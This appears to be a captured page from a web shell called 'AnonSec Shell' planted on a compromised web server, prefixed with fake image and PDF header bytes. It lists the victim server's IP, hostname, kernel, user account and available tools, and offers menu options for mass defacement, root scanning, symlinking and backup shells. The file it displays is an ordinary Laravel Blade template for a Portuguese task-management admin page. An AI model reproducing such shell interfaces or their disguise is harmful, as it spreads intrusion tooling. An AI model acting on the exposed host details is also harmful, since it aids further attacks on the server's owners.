ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/admin/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/admin/storage/framework/views/5e5a6f89883abfe06b09e07b8a8118de
<?php $__env->startSection('content'); ?>
    <section class="content-header">
        <h1>
            <?php echo e($task->name); ?>

        </h1>
    </section>

    <!-- Main content -->
    <section class="content">

        <div class="box">

            <!-- /.box-header -->
            <div class="box-body">


                <div class="col-lg-5">

                    <h4 class="text-purple">Horas trabalhadas</h4>

                    <h4 class="alert alert-success" role="alert">
                        <i class="glyphicon glyphicon-time"></i>
                        <?php echo $task->present()->hours($task->horas); ?>

                    </h4>

                    <hr>


                    <h4 class="text-purple">Data do cadastro</h4>
                    <h5><?php echo e(\Carbon\Carbon::parse($task->created_at)->format('d/m/Y - H:i')); ?> |
                        <small><i class="glyphicon glyphicon-time"></i>
                            <?php echo e(\Carbon\Carbon::parse($task->created_at)->diffForHumans()); ?>

                        </small>
                    </h5>
                    <hr>

                    <h4 class="text-purple">Iniciado em:</h4>
                    <?php if($task->start_at == null): ?>
                        Tarefa não iniciada
                    <?php else: ?>
                        <h5><?php echo e(\Carbon\Carbon::parse($task->start_at)->format('d/m/Y H:i')); ?> |
                            <small><i class="glyphicon glyphicon-time"></i>
                                <?php echo e(\Carbon\Carbon::parse($task->start_at)->diffForHumans()); ?>

                            </small>
                        </h5>
                    <?php endif; ?>
                    <hr>


                    <h4 class="text-purple">Data da entrega</h4>
                    <?php echo $task->present()->daysLeft; ?>

                    <hr>
                    <div class="clearfix"></div>

                    <hr>


                    <?php if($task->status == "Finalizado"): ?>
                        Tarefa finalizada em:
                        <strong>
                            <?php echo e(\Carbon\Carbon::parse($task->final_at)->format('d/m/Y H:i')); ?>

                        </strong>
                    <?php else: ?>
                        <h4 class="text-purple">Finalizar tarefa ou reenviar</h4>
                        <a href="<?php echo e(route('tasks.admin.update.status', $task->id)); ?>" class="btn btn-primary"><i
                                    class="glyphicon glyphicon-save"></i> Finalizar tarefa
                        </a>

                        <a href="<?php echo e(route('tasks.admin.update.reopen', $task->id)); ?>" class="btn btn-warning"><i
                                    class="glyphicon glyphicon-refresh"></i> Reenviar tarefa
                        </a>

                        <hr>
                    <?php endif; ?>

                    <h4 class="text-purple">Status</h4>
                    <?php echo $task->present()->statusAdmin($task->status); ?>


                    <hr>
                    <p><strong class="text-purple">Custo:</strong> R$ <?php echo e(number_format($task->price,2,',','.')); ?></p>

                    <p><strong class="text-purple">Cliente:</strong> <?php echo e($task->company->name); ?></p>

                    <p><strong class="text-purple">Usuário:</strong> <?php echo e($task->user->name); ?></p>
                    <hr>
                    <h4 class="text-purple">Descrição</h4>
                    <?php echo $task->description; ?>

                    <hr>

                </div>

                <div class="col-lg-7">
                    <h4 class="text-purple">Mensagens</h4>

                    <div class="panel panel-default">
                        <div class="panel-heading">Caixa de entrada</div>
                        <div class="panel-body">

                            <div class="table-responsive mailbox-messages">
                                <table class="table table-hover table-striped">
                                    <tbody>
                                    <?php foreach($task->messages as $obs): ?>
                                        <tr>
                                            <td>
                                                <?php if($obs->view == 0): ?>
                                                    <a href="<?php echo e(route('message.checked', $obs->id)); ?>"
                                                       data-toggle="tooltip" data-placement="top"
                                                       title="Marcar como visualizada">
                                                        <i class="glyphicon glyphicon-eye-open"></i>
                                                    </a>
                                                <?php else: ?>
                                                    <i class="glyphicon glyphicon-ok-circle"></i>
                                                <?php endif; ?>
                                            </td>
                                            <td class="mailbox-star col-lg-2">
                                                <?php if($obs->view == 0): ?>
                                                    <i class="fa fa-star text-yellow"></i>
                                                    <span class="badge label-info">Nova</span>
                                                <?php else: ?>
                                                    <i class="fa fa-star-o text-yellow"></i>
                                                <?php endif; ?>
                                            </td>
                                            <td class="mailbox-subject col-lg-8">
                                                <div data-toggle="modal" data-target="#myModal_<?php echo e($obs->id); ?>"
                                                     style="cursor: pointer">
                                                    <b><?php echo e($obs->name); ?></b>
                                                </div>
                                            </td>
                                            <td class="mailbox-date col-lg-2">
                                                <small><i class="glyphicon glyphicon-time"></i>
                                                    <?php echo e(\Carbon\Carbon::parse($obs->created_at)->diffForHumans()); ?>

                                                </small>
                                            </td>
                                        </tr>

                                        <div class="modal fade" id="myModal_<?php echo e($obs->id); ?>" tabindex="-1" role="dialog"
                                             aria-labelledby="myModalLabel">
                                            <div class="modal-dialog">
                                                <div class="modal-content">
                                                    <div class="modal-header">
                                                        <button type="button" class="close" data-dismiss="modal"
                                                                aria-label="Close"><span
                                                                    aria-hidden="true">&times;</span></button>
                                                        <h4 class="modal-title"><?php echo e($obs->name); ?></h4>
                                                    </div>
                                                    <div class="modal-body">
                                                        <p><?php echo $obs->description; ?></p>
                                                    </div>
                                                </div>
                                                <!-- /.modal-content -->
                                            </div>
                                            <!-- /.modal-dialog -->
                                        </div><!-- /.modal -->

                                    <?php endforeach; ?>

                                    </tbody>
                                </table>
                            </div>

                        </div>
                    </div>


                </div>


            </div>
            <!-- /.box-body -->
        </div>
        <!-- /.box -->


    </section>
    <!-- /.content -->
<?php $__env->stopSection(); ?>
<?php echo $__env->make('master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team